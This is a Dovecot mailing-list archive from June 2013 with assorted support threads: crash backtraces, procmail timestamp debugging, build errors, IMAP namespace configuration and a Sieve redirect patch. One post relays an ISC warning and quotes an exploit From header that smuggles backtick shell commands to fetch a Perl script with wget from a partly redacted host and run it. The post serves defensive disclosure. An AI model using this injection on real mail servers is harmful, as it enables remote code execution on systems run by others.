(cmd=0x21ddf40) at imap-client.c:836 client = 0x21dd360 command = __FUNCTION__ = "client_command_input" #17 0x0000000000415b35 in client_handle_next_command (remove_io_r=, client=0x21dd360) at imap-client.c:874 No locals. #18 client_handle_input (client=client at entry=0x21dd360) at imap-client.c:886 _data_stack_cur_id = 3 ret = 32 remove_io = false handled_commands = false __FUNCTION__ = "client_handle_input" #19 0x0000000000415ee2 in client_input (client=0x21dd360) at imap-client.c:928 cmd = output = 0x21ddd78 bytes = 19 __FUNCTION__ = "client_input" #20 0x00007fecd8922d06 in io_loop_call_io (io=0x21dde40) at ioloop.c:387 ioloop = 0x21b7720 t_id = 2 #21 0x00007fecd8923b77 in io_loop_handler_run (ioloop=ioloop at entry=0x21b7720) at ioloop-epoll.c:215 ctx = 0x21b7a90 events = 0x21ca6d0 event = 0x21b7b00 list = 0x21dde90 io = tv = {tv_sec = 3, tv_usec = 876580} events_count = msecs = ret = 1 i = call = __FUNCTION__ = "io_loop_handler_run" #22 0x00007fecd8922848 in io_loop_run (ioloop=0x21b7720) at ioloop.c:406 No locals. #23 0x00007fecd88d8b53 in master_service_run (service=0x21b75b0, callback=callback at entry=0x41ed00 ) at master-service.c:560 No locals. #24 0x000000000040baf8 in main (argc=1, argv=0x21b7390) at main.c:400 set_roots = {0x4262e0, 0x0} login_set = {auth_socket_path = 0x21af040 "\001", postlogin_socket_path = 0x0, postlogin_timeout_secs = 60, callback = 0x41ebb0 , failure_callback = 0x41e8c0 , request_auth_token = 1} service_flags = storage_service_flags = username = 0x0 c = -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 198 bytes Desc: Digital signature URL: From tlx at leuxner.net Fri Jun 7 10:20:42 2013 From: tlx at leuxner.net (Thomas Leuxner) Date: Fri, 7 Jun 2013 09:20:42 +0200 Subject: [Dovecot] v2.2.2 (e5bd0a7c6a1e) Core Dump In-Reply-To: <20130607070255.GA2491@nihlus.leuxner.net> References: <20130607070255.GA2491@nihlus.leuxner.net> Message-ID: <20130607072042.GA2666@nihlus.leuxner.net> * Thomas Leuxner 2013.06.07 09:02: > (gdb) bt full Culprit in config being: plugin { acl = vfile:/var/vmail/conf.d/%d/acls:cache_secs=300 } -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 198 bytes Desc: Digital signature URL: From ben at morrow.me.uk Wed Jun 5 18:10:18 2013 From: ben at morrow.me.uk (Ben Morrow) Date: Wed, 5 Jun 2013 16:10:18 +0100 Subject: [Dovecot] Dovecot and time (again) In-Reply-To: <20130605090243.Horde.I38gZKUGEHYk47lt2hL8YQ1@beta.vfemail.net> References: <20130605090243.Horde.I38gZKUGEHYk47lt2hL8YQ1@beta.vfemail.net> Message-ID: <20130605151017.GD23372@anubis.morrow.me.uk> At 9AM -0500 on 5/06/13 you (Rick Romero) wrote: > I'm rehashing/reliving my issues from 2010: > http://www.dovecot.org/list/dovecot/2010-October/053528.html > > In short, when calling deliver from vdelivermail (or procmail), and > delivering via NFS to Maildir, the timestamp on the file is GMT.? If > procmail or vdelivermail completely handle the email, the timestamp is CST. > The server is set to CST. Um, the timestamp on a file doesn't have a timezone. It's a Unix time in seconds since the epoch; any conversion to or from a human time with a timestamp happens in the program reading or writing the timestamp. The server being 'set to' CST doesn't actually mean anything very solid: it just serves as a default timezone for processes that don't have TZ set. > What's changed from the original issue?? > Previously was running dovecot 1.x on FreeBSD, now 2.1.7 on Debian 7.?? I > know it's a few versions behind, but this is a deliver only server, and > ChangeLog doesn't show too many fixes for lda. > Of course, running the command from the command line works perfectly... So > where could my problem reside? > Two examples: > > 1st via Calling from procmail: > :0 > * ? test -f /usr/lib/dovecot/dovecot-lda > { > :0w > |/usr/lib/dovecot/deliver -d $EXT@$HOST > } > > -rw-------??? 1 vpopmail? vchkpw? 87196 Jun? 5 13:43 > 1370439849.M812P29560.smtp101,S=87196,W=88094 Well, that's certainly peculiar; the datestamp there resolves as 13.43 UTC or 8.44 CDT. Are you able to list the file's timestamp as a Unix time, to compare with the timestamp in the filename? On my system I can use 'ls -lD %s' but I don't know how portable that is. You might be able to use stat(1). How many machines are involved here? (Including the machine you ran that 'ls' from.) Are you running NTP, and do they all have their clocks correct? AFAICT Dovecot only attempts to set the mtime for IMAP APPEND and dsync; the LDA just opens the file and lets the OS set the timestamp. Are you able to temporarily change the procmail recipe to touch(1) a file inside the maildir rather than making a proper delivery, just to get some idea of where the problem might be? > 2nd via Commandline: > #sudo -u vpopmail cat /tmp/testmail.txt | /usr/lib/dovecot/deliver -d > rick at havokmon.com > > -rw-------??? 1 vpopmail? vchkpw? 27740 Jun? 5 08:46 > 1370440001.M421646P29846.smtp101,S=27740,W=28243 I assume you ran that ls on the same machine and with the same environment as the one above? > I've thrown the TZ variable in the mix as well with no resolution > |/usr/bin/env -i TZ=CST /usr/lib/dovecot/deliver -d $EXT@$HOST > |/usr/bin/env -i TZ=America/Chicago /usr/lib/dovecot/deliver -d $EXT@$HOST Given that LDA doesn't do any date parsing, it just handles dates as Unix timestamps, I'd have been very surprised if that made any difference. Ben From ben at morrow.me.uk Wed Jun 5 11:17:02 2013 From: ben at morrow.me.uk (Ben Morrow) Date: Wed, 5 Jun 2013 09:17:02 +0100 Subject: [Dovecot] Make install error In-Reply-To: <51ADB349.6060700@mysql.cc> <51ADB38B.6040507@mysql.cc> <51ADB986.6030107@mysql.cc> Message-ID: <20130605081701.GC23372@anubis.morrow.me.uk> At 5PM +0800 on 4/06/13 you (kengheng) wrote: > On 5/17/13 7:12 PM, Ben Morrow wrote: > > At 5PM +0800 on 15/05/13 you (kengheng) wrote: > >> On 4/24/13 11:50 PM, Ben Morrow wrote: > >>> > >>> These files should be installed under libexec; probably > >>> /usr/local/dovecot/libexec/dovecot, though I'm not sure how autoconf > >>> chooses the libexec directory when you're using an explicit prefix. What > >>> do the following give you (in the top-level Dovecot source dir)? > >>> > >>> grep ^libexecdir config.log > >>> grep ^exec_prefix config.log > >>> grep ^prefix config.log > >> grep ^libexecdir config.log > >> libexecdir='${exec_prefix}/lib' > >> > >> grep ^exec_prefix config.log > >> exec_prefix='${prefix}' > >> > >> grep ^prefix config.log > >> prefix='/usr/local/dovecot' > > That's weird, and wrong. Also, I can't reproduce it; if I run > > > > ./configure --prefix=/usr/local/dovecot > > grep ^libexec config.log > > > > in the 2.2.1 tarball I get > > > > libexecdir='${exec_prefix}/libexec' > > > > as I would have expected. Are you sure you didn't pass a --libexecdir > > argument to configure? > > Hi, yes, the configure without "--libexecdir" . > > and i found this comment from config.log: > | # If user did not specify libexecdir, set the correct target: > | # Nor FHS nor openSUSE allow prefix/libexec. Let's default to prefix/lib. > | > | if test "$libexecdir" = '${exec_prefix}/libexec' ; then > | libexecdir='${exec_prefix}/lib' > | fi Since neither that comment nor that code appear anywhere in the Dovecot 2.2.1 tarball, I have to assume you're using a patched version from a SRPM or something. It would have been helpful to mention that; also helpful to try with the unpatched version before posting. Whoever patched that code in either didn't understand that Dovecot needs lib and libexec to be different, or had a workaround of some kind. I would recommend using the real 2.2.1 sources from dovecot.org instead. At 5PM +0800 on 4/06/13 you (kengheng) wrote: > For your note, I'm installing dovecot on opensuse (32bits) 12.2 and 12.3 > , both produced the same errors. At 5PM +0800 on 4/06/13 you (kengheng) wrote: > I've success installed it with a workaround: > > 1) after error, create a folder /usr/local/dovecot/lib/dovecot/auth > 2) make install again, and it will install the file auth at > /usr/local/dovecot/lib/dovecot/auth That installation will not work, you've just tricked install(1) into not giving you an error. Dovecot needs ${libexecdir}/dovecot/auth to be an executable: it's one of the daemon processes, and if you've put a directory there the exec will fail. Installing it to ${libexecdir}/dovecot/auth/auth instead won't help, since Dovecot won't be looking for it there. Ben From ben at morrow.me.uk Wed Jun 5 20:32:38 2013 From: ben at morrow.me.uk (Ben Morrow) Date: Wed, 5 Jun 2013 18:32:38 +0100 Subject: [Dovecot] dovecot and time In-Reply-To: <20130605114501.Horde.3Gl0lACLt3KPdkxODl2cBg2@beta.vfemail.net> References: <20130605151017.GD23372@anubis.morrow.me.uk> <20130605114501.Horde.3Gl0lACLt3KPdkxODl2cBg2@beta.vfemail.net> Message-ID: <20130605173237.GE23372@anubis.morrow.me.uk> At 11AM -0500 on 5/06/13 you (Rick Romero) wrote: > I found something interesting via strace. lda is writing a timestamp > with utime before doign the fsync, but I'm really not a C guy, so I > have no idea why that's going on via procmail and not via commandline. > I assume it's related to the choice of pread64 vs read. > > when called from commandline (working): > > read(0, "July 14-20, 2013\n10 courses. Bon"..., 4096) = 4096 [...] > open("/usr/home/vpopmail/domains/havokmon.com/rick/Maildir/tmp/1370448645.M589211P14191.smtp101", O_WRONLY|O_CREAT|O_EXCL|O_TRUNC|O_LARGEFILE, 0777) = > 11 [...] > > when called from procmail (not working): > > pread64(10, "00.vfemail.net,S=10941\n968 W2552"..., 4064, 52993) = 4064 [...] > open("/usr/home/vpopmail/domains/havokmon.com/rick/Maildir/tmp/1370449940.M313792P17436.smtp101", > O_WRONLY|O_CREAT|O_EXCL|O_TRUNC|O_LARGEFILE, 0777) = > 11 [...] > utime("/usr/home/vpopmail/domains/havokmon.com/rick/Maildir/tmp/1370449940.M313792P17436.smtp101", [2013/06/05-16:32:20, 2013/06/05-21:32:18]) = [...] Eeenteresting. The pread64 vs read is presumably because procmail is passing lda a regular file on stdin rather than a pipe; you can't use pread on a pipe. I wondered if maybe lda might be copying the timestamp across from its input file, which it isn't, but while checking that I found this (in src/lda/main.c): /* If input begins with a From-line, drop it */ ret = i_stream_read_data(input, &data, &size, 5); if (ret > 0 && size >= 5 && memcmp(data, "From ", 5) == 0) { /* ... */ (void)mbox_from_parse(data, i, mtime_r, &tz, &sender); /* ... */ } which says to me that if lda is passed a mail starting with an mbox-format From_ line, it will use the datestamp from that line rather than the current time. Procmail likes to give things From_ lines, so it's likely this is what's happening. Can you add something to the procmail recipe to write the mail out somewhere unmodified, to see whether procmail is writing the date out wrong or dovecot is parsing it wrong? Presumably the timezone information is getting screwed up somewhere; is procmail leaving it out altogether, or maybe writing a named timezone (which Dovecot will ignore, apparently)? You may be able to help matters by running the whole delivery process (both procmail and lda) with TZ=UTC (and probably LC_ALL=C for good measure), just to try and get things to use machine-readable rather than human-readable timestamp formats. You could also try head -n +1 | lda, or something a little less crude. Ben From maillist.debian at gmail.com Fri Jun 7 10:23:53 2013 From: maillist.debian at gmail.com (Alex Dubinin) Date: Fri, 07 Jun 2013 11:23:53 +0400 Subject: [Dovecot] Dovecot IMAP Message-ID: <51B18A89.5040609@gmail.com> This is my first experience of the mail server. Set up a mail server from Postfix + Dovecot with the MySQL authorization. When you create a new user dovecot makes strange folder structure: the 'inbox' contains 'juncus', 'tash', 'sent' etc. ie 'sent' and other folders are subdir to the 'inbox'. My result: 04 LIST "" "*" * LIST (\HasChildren) "." "INBOX" * LIST (\HasNoChildren) "." "INBOX.Trash" I want: 04 LIST "" "*" * LIST (\HasNoChildren) "." "INBOX" * LIST (\HasNoChildren) "." "Trash" # dovecot --version 2.1.7 # dovecot -n # 2.1.7: /etc/dovecot/dovecot.conf # OS: Linux 3.2.0-4-amd64 x86_64 Debian 7.0 ext4 auth_debug = yes auth_debug_passwords = yes auth_verbose = yes auth_verbose_passwords = plain base_dir = /run/dovecot/ debug_log_path = /var/vmail/dovecot.log disable_plaintext_auth = no info_log_path = /var/vmail/dovecot.log lda_mailbox_autocreate = yes lda_mailbox_autosubscribe = yes listen = MY_IP log_path = /var/vmail/dovecot.log log_timestamp = "%Y-%m-%d %H:%M:%S " login_greeting = MAIL_DOMAIN_NAME IMAP server ready. mail_debug = yes mail_location = maildir:/var/vmail/%d/%n/Maildir mail_plugins = " quota" namespace inbox { hidden = no inbox = yes list = yes location = mailbox Drafts { special_use = \Drafts } mailbox Trash { special_use = \Trash } mailbox Junk { special_use = \Junk } mailbox Sent { special_use = \Sent } prefix = INBOX. separator = . type = private } passdb { args = /etc/dovecot/dovecot-sql.conf.ext driver = sql } plugin { quota = maildir:User quota quota_rule = *:storage=1G quota_rule2 = Trash:storage=+10%% quota_rule3 = Junk:storage=+10%% quota_rule4 = Drafts:storage=+10%% quota_warning = storage=95%% quota-warning 95 %u } postmaster_address = admin@ MAIL_DOMAIN_NAME protocols = " imap pop3" service auth-worker { executable = auth -w unix_listener auth-worker { group = mode = 0600 } } service auth { unix_listener /var/spool/postfix/private/auth { group = postfix mode = 0660 user = postfix } unix_listener auth-master { group = vmail mode = 0600 user = vmail } unix_listener auth-userdb { group = mode = 0600 user = } user = root } service dict { unix_listener dict { group = mode = 0600 user = } } service imap-login { inet_listener imap { port = 0 } inet_listener imaps { port = 993 ssl = yes } process_min_avail = 0 service_count = 1 } service imap { unix_listener login/imap { group = mode = 0666 user = } } service lmtp { unix_listener lmtp { group = mode = 0666 user = } } service pop3-login { inet_listener pop3 { port = 0 } inet_listener pop3s { port = 0 ssl = yes } } service pop3 { unix_listener login/pop3 { group = mode = 0666 user = } } ssl = required ssl_ca = From luca.fornasari at gmail.com Fri Jun 7 15:28:39 2013 From: luca.fornasari at gmail.com (Luca Fornasari) Date: Fri, 7 Jun 2013 14:28:39 +0200 Subject: [Dovecot] Dovecot IMAP In-Reply-To: <51B18A89.5040609@gmail.com> References: <51B18A89.5040609@gmail.com> Message-ID: On Fri, Jun 7, 2013 at 9:23 AM, Alex Dubinin wrote: > This is my first experience of the mail server. > Set up a mail server from Postfix + Dovecot with the MySQL authorization. > When you create a new user dovecot makes strange folder structure: the > 'inbox' contains 'juncus', 'tash', 'sent' etc. > ie 'sent' and other folders are subdir to the 'inbox'. > > My result: > > 04 LIST "" "*" > * LIST (\HasChildren) "." "INBOX" > * LIST (\HasNoChildren) "." "INBOX.Trash" > > I want: > > 04 LIST "" "*" > * LIST (\HasNoChildren) "." "INBOX" > * LIST (\HasNoChildren) "." "Trash" > > namespace inbox { > hidden = no > inbox = yes > list = yes > location = > mailbox Drafts { > special_use = \Drafts > } > mailbox Trash { > special_use = \Trash > } > mailbox Junk { > special_use = \Junk > } > mailbox Sent { > special_use = \Sent > } > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> prefix = INBOX. > separator = . > type = private > } > You explicitly told Dovecot to ... Luca From alec at alec.pl Fri Jun 7 15:29:01 2013 From: alec at alec.pl (A.L.E.C) Date: Fri, 07 Jun 2013 14:29:01 +0200 Subject: [Dovecot] Dovecot IMAP In-Reply-To: <51B18A89.5040609@gmail.com> References: <51B18A89.5040609@gmail.com> Message-ID: <51B1D20D.2090703@alec.pl> On 06/07/2013 09:23 AM, Alex Dubinin wrote: > How to make the imap folders 'sent', 'trash' and others were not affiliated? Remove this: prefix = INBOX. -- Aleksander 'A.L.E.C' Machniak LAN Management System Developer [http://lms.org.pl] Roundcube Webmail Developer [http://roundcube.net] --------------------------------------------------- PGP: 19359DC1 @@ GG: 2275252 @@ WWW: http://alec.pl From ltlbeaver at gmail.com Fri Jun 7 16:32:39 2013 From: ltlbeaver at gmail.com (John Doe) Date: Fri, 7 Jun 2013 16:32:39 +0300 Subject: [Dovecot] per user quota in mysql Message-ID: Hello everybody, I have set up dovecot to use ldap authentication and it works great. I wonder if it is possible to use mysql for user quota and still keep my ldap authentication. Thank you! From joewong99 at gmail.com Fri Jun 7 20:44:24 2013 From: joewong99 at gmail.com (Joe Wong) Date: Sat, 8 Jun 2013 01:44:24 +0800 Subject: [Dovecot] Question on Director setup Message-ID: Hello, I am following the wiki page to setup 2 IMAP servers Director. in each server, I have created 2 sets of dovecot config file where the first set is for imap proxy with director the second set is for the imap backend after this, I attempt to login IMAP through the imap-proxy on any machine with several users. from the log, all users always go to the same IMAP backend in Server 2, I don't see any user go to the IMAP backend in Server 1 at all. What could be the problem I have ? - Joe From mrten+dovecot at ii.nl Sat Jun 8 14:27:34 2013 From: mrten+dovecot at ii.nl (Mrten) Date: Sat, 08 Jun 2013 13:27:34 +0200 Subject: [Dovecot] crash/mem violation in auth_worker + 50G logs in 2.1.7 Message-ID: <51B31526.2030609@ii.nl> Hi, This morning I discovered what seemed to be a deliberate crash in auth_worker: Jun 7 23:02:09 localhost dovecot: auth-worker: Error: #007Can't read dir of '/etc/mysql/conf.d/' (Errcode: 2) Jun 7 23:02:09 localhost dovecot: auth-worker: Error: Fatal error in defaults handling. Program aborted Jun 7 23:02:09 localhost dovecot: auth-worker: Error: *** glibc detected *** dovecot/auth worker: waiting for connection: free(): invalid pointer: 0x00007fffa0863160 *** Jun 7 23:02:09 localhost dovecot: auth-worker: Error: ======= Backtrace: ========= Jun 7 23:02:09 localhost dovecot: auth-worker: Error: /lib/x86_64-linux-gnu/libc.so.6(+0x7eb96)[0x7f22d42f9b96] Jun 7 23:02:09 localhost dovecot: auth-worker: Error: /usr/lib/libmysqlclient.so.18(free_root+0x90)[0x7f22d37988c0] Jun 7 23:02:09 localhost dovecot: auth-worker: Error: /usr/lib/libmysqlclient.so.18(free_defaults+0x4b)[0x7f22d3796e6b] Jun 7 23:02:09 localhost dovecot: auth-worker: Error: /usr/lib/libmysqlclient.so.18(mysql_read_default_options+0x13c)[0x7f22d377d00c] Jun 7 23:02:09 localhost dovecot: auth-worker: Error: /usr/lib/libmysqlclient.so.18(mysql_real_connect+0x8e)[0x7f22d377eb4e] Jun 7 23:02:09 localhost dovecot: auth-worker: Error: /usr/lib/dovecot/modules/auth/libdriver_mysql.so(+0x1fc6)[0x7f22d3c52fc6] Jun 7 23:02:09 localhost dovecot: auth-worker: Error: dovecot/auth worker: waiting for connection(+0x2be1d)[0x7f22d515be1d] Jun 7 23:02:09 localhost dovecot: auth-worker: Error: dovecot/auth worker: waiting for connection(db_sql_connect+0xd)[0x7f22d514aedd] Jun 7 23:02:09 localhost dovecot: auth-worker: Error: dovecot/auth worker: waiting for connection(+0x23d70)[0x7f22d5153d70] Jun 7 23:02:09 localhost dovecot: auth-worker: Error: dovecot/auth worker: waiting for connection(passdb_init+0x2a)[0x7f22d515158a] Jun 7 23:02:09 localhost dovecot: auth-worker: Error: dovecot/auth worker: waiting for connection(auths_init+0x59)[0x7f22d513dfe9] Jun 7 23:02:09 localhost dovecot: auth-worker: Error: dovecot/auth worker: waiting for connection(main+0x345)[0x7f22d513d5f5] Jun 7 23:02:09 localhost dovecot: auth-worker: Error: /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xed)[0x7f22d429c76d] Jun 7 23:02:09 localhost dovecot: auth-worker: Error: dovecot/auth worker: waiting for connection(+0xd7d9)[0x7f22d513d7d9] There follows a memory map but I snipped that. This repeated until I killed dovecot (12 hours later), by then 54GB of logs had accumulated. Besides leaving me impressed with the logserver :), I was wondering if this is a known problem. I don't know what triggered this at 23:02 (shown above is the first set of problem logentries). Can't really have been an upgrade, since I backported the raring dovecot Ubuntu package for my precise server, no automated upgrades there. I did go look for the /etc/mysql/conf.d directory mentioned, it wasn't there, but there was a /etc/mysql/my.cnf trying to !includedir it. Since there is no mysql on the server besides libmysqlclient I removed the directory and haven't seen the problem return yet. Sounds like the reason for happening, however, the memory error after that probably warrants research? If it is in libmysqlclient, that's another non-default snag because that's the lib I get from Percona, not the Ubuntu default one. Shouldn't dovecot recognize that the auth worker is crashing? One more thing, this is (one line from many) from audit.log (I have auditd logging audit records) type=ANOM_ABEND msg=audit(1370682566.377:3499876): auid=4294967295 uid=108 gid=115 ses=4294967295 pid=23187 comm="auth" reason="memory violation" sig=6 108 is the dovecot user, so it probably is related. I realise I'm way off defaults here but I wanted to report anyway. (dovecot -n attached) thanks for any insight, Maarten. -------------- next part -------------- # 2.1.7: /etc/dovecot/dovecot.conf # OS: Linux 3.2.0-43-virtual x86_64 Ubuntu 12.04.2 LTS auth_cache_negative_ttl = 0 auth_cache_size = 10 M auth_cache_ttl = 5 mins auth_failure_delay = 3 secs auth_username_chars = abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890.-@ disable_plaintext_auth = no log_timestamp = "%Y-%m-%d %H:%M:%S " mail_save_crlf = yes maildir_stat_dirs = yes namespace inbox { inbox = yes location = mailbox Drafts { special_use = \Drafts } mailbox Junk { special_use = \Junk } mailbox Sent { special_use = \Sent } mailbox "Sent Messages" { special_use = \Sent } mailbox Trash { special_use = \Trash } prefix = } passdb { args = /etc/dovecot/extra/dovecot-sql.conf.ext driver = sql } plugin { fts = squat quota = maildir:User quota quota_rule = *:bytes=10G quota_rule2 = Trash:bytes=+100M trash = /etc/dovecot/conf.d/trash var_domainpart = %d var_remote = %r var_service = %Ls var_user = %u var_userpart = %n } protocols = imap pop3 service auth-worker { user = $default_internal_user } service auth { unix_listener /var/spool/exim4/private/auth { mode = 0660 } unix_listener auth-userdb { group = root mode = 0600 user = root } user = $default_internal_user } service imap-login { chroot = login inet_listener imap { port = 0 } inet_listener imaps { address = * } process_limit = 128 process_min_avail = 3 service_count = 1 user = $default_internal_user vsz_limit = 64 M } service imap { drop_priv_before_exec = yes executable = imap imap_postlogin process_limit = 256 vsz_limit = 512 M } service imap_postlogin { executable = script-login /etc/dovecot/imap_helper.sh } service pop3-login { chroot = login process_limit = 128 process_min_avail = 3 service_count = 1 user = $default_internal_user } service pop3 { drop_priv_before_exec = yes executable = pop3 pop3_postlogin process_limit = 256 vsz_limit = 512 M } service pop3_postlogin { executable = script-login /etc/dovecot/pop3_helper.sh } ssl_cert = We have a quite large user base, with lots of bad folder names because the mail folders was earlier accessible outside of dovecot. Now we're running dsync conversions from maildir to mdbox for all users, but are struggelig a bit with dsync not liking invalid folder names. Before we convert a user we try to determine if the folder names are valid, but we don't have a very good regexp for validating it. Maybe someone else knows a way to verify (and fix?) folder names that are invalid. The rules I know is: - name doesn't start with '.' or '~' (after the initial '.') - name doesn't end with '.' - the name doesn't contain '..' - the name is valid mUTF7 So, any regexp gurus that can distill those rules down to something usable? -jf -- Some people, when confronted with a problem, think "I know, I'll use regular expressions." Now they have two problems. -jwz From tss at iki.fi Sun Jun 9 03:14:09 2013 From: tss at iki.fi (Timo Sirainen) Date: Sun, 9 Jun 2013 03:14:09 +0300 Subject: [Dovecot] search and UTF-8 normalization forms (NFD) In-Reply-To: References: <730F760C-FC67-42C0-8405-770114D27063@iki.fi> <518CF527.3010705@babelmonkeys.de> <518E6032.8000304@babelmonkeys.de> Message-ID: <61F19C3B-32B2-4959-A15F-9D46FC460F6B@iki.fi> On 21.5.2013, at 14.41, Lutz Pre?ler wrote: > On Mi, 15 Mai 2013, Timo Sirainen wrote: > >> On 11.5.2013, at 18.13, Florian Zeitz wrote: >>> So... I had a look at this. Turns out that the current implementation of >>> Unicode decomposition (Step 2(b) in i;unicode-casemap) in Dovecot is >>> broken. It only handles decomposition properties that include a tag. >>> I've attached a hg export that fixes this. >> >> Thanks, added to v2.1 and v2.2 hg. >> > Thanks, but there seems to be still a problem left. Sender search > yields all Kr?ger mails without fts_lucene. But with fts_lucene > enabled - and files in lucene-indexes/ existing - it's not. > (If I delete the lucene-index files and search for sender, > result is correct - but only until they are recreated.) Fixed finally: http://hg.dovecot.org/dovecot-2.2/rev/7e54af474ea4 Add plugin { fts_lucene = normalize no_snowball } setting (NOTE: this change causes all the existing lucene indexes to be rebuilt). This fts-lucene is getting rather annoying. I wonder if all of this is somehow magically solved in Solr. From tss at iki.fi Sun Jun 9 03:19:05 2013 From: tss at iki.fi (Timo Sirainen) Date: Sun, 9 Jun 2013 03:19:05 +0300 Subject: [Dovecot] Speed up mail retrieval by keyword In-Reply-To: <7c414fab933f69623cdf571e3e03e523@webmail.scheller-usselmann.de> References: <7c414fab933f69623cdf571e3e03e523@webmail.scheller-usselmann.de> Message-ID: <6C5DF4A7-5F21-4F2F-9919-3F7CA5810050@iki.fi> On 22.5.2013, at 22.31, Manfred Usselmann wrote: > I' m using a roundcube plugin for adding attributes to mails, which are > stored as IMAP keywords (https://github.com/umount/message_label [1]). > > This plugin allows me to retrieve mails with a certain attribute across > all my mail folders. > > Selecting mails this way is very convenient, but also very slow, > probably because I've got a lot of mails and folders. > > Is there a way to speed this up somehow by changing any configuration > options? Instead of the Roundcube plugin you could use Dovecot's virtual plugin to create a virtual mailbox that contains all the mails with the keyword: http://wiki2.dovecot.org/Plugins/Virtual From andriys at gmail.com Sun Jun 9 00:37:34 2013 From: andriys at gmail.com (Andriy Syrovenko) Date: Sun, 9 Jun 2013 00:37:34 +0300 Subject: [Dovecot] Problem redirecting email using pigeonhole 0.4.0 (with patch) Message-ID: Hello, Starting from the version 0.4.0 Pigeonhole adds "X-Sieve" and "X-Sieve-Redirected-From" headers ending them with CR+LF, and then copies the original message (including original headers) ending the lines with LF-only. This causes troubles at least if using Exim (I have not checked with other MTAs)- original message gets dropped, and only the new pigeonhole-generated headers are sent out. The attached file fixed the problem for me. --- dovecot-2.2-pigeonhole-0.4.0.orig/src/lib-sieve/cmd-redirect.c 2013-04-07 01:57:26.000000000 +0300 +++ dovecot-2.2-pigeonhole-0.4.0/src/lib-sieve/cmd-redirect.c 2013-06-05 03:22:53.000000000 +0300 @@ -344,9 +344,9 @@ string_t *hdr = t_str_new(256); /* Prepend sieve headers (should not affect signatures) */ - rfc2822_header_write(hdr, "X-Sieve", SIEVE_IMPLEMENTATION); + rfc2822_header_append(hdr, "X-Sieve", SIEVE_IMPLEMENTATION, FALSE, NULL); if ( recipient != NULL ) - rfc2822_header_write(hdr, "X-Sieve-Redirected-From", recipient); + rfc2822_header_append(hdr, "X-Sieve-Redirected-From", recipient, FALSE, NULL); o_stream_send(output, str_data(hdr), str_len(hdr)); } T_END; Best regards, Andrey. -------------- next part -------------- A non-text attachment was scrubbed... Name: crlf.patch Type: application/octet-stream Size: 838 bytes Desc: not available URL: From me at junc.eu Sun Jun 9 07:22:40 2013 From: me at junc.eu (Benny Pedersen) Date: Sun, 09 Jun 2013 06:22:40 +0200 Subject: [Dovecot] per user quota in mysql In-Reply-To: References: Message-ID: John Doe skrev den 2013-06-07 15:32: > I have set up dovecot to use ldap authentication and it works great. > I wonder if it is possible to use mysql for user quota and still keep > my > ldap authentication. yes no problem, for more help check postfixadmin on sf.net, even if you dont use it, there is good examples on configure it with dovecot quotas -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From claus.r at bayern-mail.de Sun Jun 9 09:23:08 2013 From: claus.r at bayern-mail.de (Claus) Date: Sun, 09 Jun 2013 08:23:08 +0200 Subject: [Dovecot] rawlog without setting home in userdb In-Reply-To: <51AAFE3C.8080701@bayern-mail.de> References: <51AAFE3C.8080701@bayern-mail.de> Message-ID: <51B41F4C.8000406@bayern-mail.de> can anybody help me? Am 02.06.2013 10:11, schrieb Claus: > Hi all, > > in my settup i decided to set mail_home in 10-mail.conf, > and let dovecot do the hashing to a 2-level directory structure. > > mail_location = mdbox:~/mdbox:ALT=/altstorage/%h/mdbox > mail_home = /vmail/%1Mu/%2.1Mu/%u > > In my userdb ist homedirectory not set and everythink works as expected, > except when i use rawlog i get only logs in ~/dovecot.rawlog if home > is set in userdb. > In wiki http://wiki2.dovecot.org/Debugging/Rawlog > it reads: > > If you don't have the home directory and you can't or don't want to > modify userdb configuration, you can add: > mail_home = /home/%u > # or temporarily even e.g. mail_home = /tmp/temp-home > > > Can you tell me, if my problem is the hashing-configuration or > anything else? > > Claus > From lists at luigirosa.com Sun Jun 9 10:58:12 2013 From: lists at luigirosa.com (Luigi Rosa) Date: Sun, 09 Jun 2013 09:58:12 +0200 Subject: [Dovecot] from ISC: Exim/Dovecot exploit making the rounds Message-ID: <51B43594.8030705@luigirosa.com> One of our readers wrote in to let us know that he had received an attempted Exim/Dovecot exploit attempt against his email server. The exploit partially looked like this: From: x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com (Obviously edited for your safety, and I didn't post the whole thing.) This is an exploit against Dovecot that is using the feature "use_shell" against itself. This feature, unfortunately, is found in the example wiki on Dovecot's website, and also in their example configuration. We'd caution anyone that is using Dovecot to take a look at their configuration and make use they aren't using the "use_shell" parameter. Or if you are, make darn sure you know what you are doing, and how to defend yourself. https://isc.sans.edu/diary/EximDovecot+exploit+making+the+rounds/15962 Ciao, luigi -- / +--[Luigi Rosa]-- \ The generation of random numbers is too important to be left to chance. From tlx at leuxner.net Sun Jun 9 11:12:56 2013 From: tlx at leuxner.net (Thomas Leuxner) Date: Sun, 9 Jun 2013 10:12:56 +0200 Subject: [Dovecot] v2.2.2 (266101990d63) Core Dump Message-ID: ==> /var/log/dovecot/dovecot.log <== Jun 9 09:58:26 spectre dovecot: lmtp: Fatal: master: service(lmtp): child 12635 killed with signal 11 (core dumped) This is another segmentation fault introduced in the current code. Please also look into fixing the other Core Dump I reported: http://www.dovecot.org/list/dovecot/2013-June/090795.html (gdb) bt full #0 0x00007f305d3df646 in buffer_append (buf=0x0, data=0x7fff92c0d218, data_size=0) at buffer.c:184 No locals. #1 0x00007f305d6bee16 in array_append_i (data=0x7fff92c0d218, array=0x1267448, count=) at ../../src/lib/array.h:148 count = 1 #2 mail_namespace_add_storage (ns=ns at entry=0x12673f0, storage=0x7fff92c0d218, storage at entry=0x126cb50) at mail-namespace.c:39 No locals. #3 0x00007f305d6c488d in mail_storage_create_full (ns=ns at entry=0x12673f0, driver=, driver at entry=0x7f305d7263a4 "raw", data=, flags=flags at entry=0, storage_r=storage_r at entry=0x7fff92c0d318, error_r=error_r at entry=0x7fff92c0d338) at mail-storage.c:397 storage_class = 0x7f305d95a560 storage = 0x126cb50 list = 0x1271800 list_set = {layout = 0x125b050 "none", root_dir = 0x125b048 "", index_dir = 0x0, index_pvt_dir = 0x0, control_dir = 0x0, alt_dir = 0x0, inbox_path = 0x0, subscription_fname = 0x7f305d72310d "subscriptions", maildir_name = 